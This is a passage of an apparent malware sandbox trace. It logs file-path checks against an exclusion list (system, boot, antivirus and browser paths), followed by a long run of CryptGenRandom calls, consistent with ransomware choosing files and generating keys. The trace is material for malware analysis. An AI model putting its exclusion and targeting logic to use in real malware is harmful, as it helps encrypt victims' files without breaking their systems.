returned 0 [0168.955] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.lnk") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.bat") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.ini") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.msi") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*.scf") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*AppData*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\java\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\windows\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*Atheros*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*Realtek*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*bootmgr*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*boot*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*boot*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*IO.SYS*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*ntldr*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*chrome*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*opera*") returned 0 [0168.956] PathMatchSpecW (pszFile="msaddsr.dll.mui", pszSpec="*firefox*") returned 0 [0168.956] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", pszSpec="*") returned 1 [0168.956] strlen (_Str="NMoreira") returned 0x8 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.956] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.957] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.958] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.959] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0168.960] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 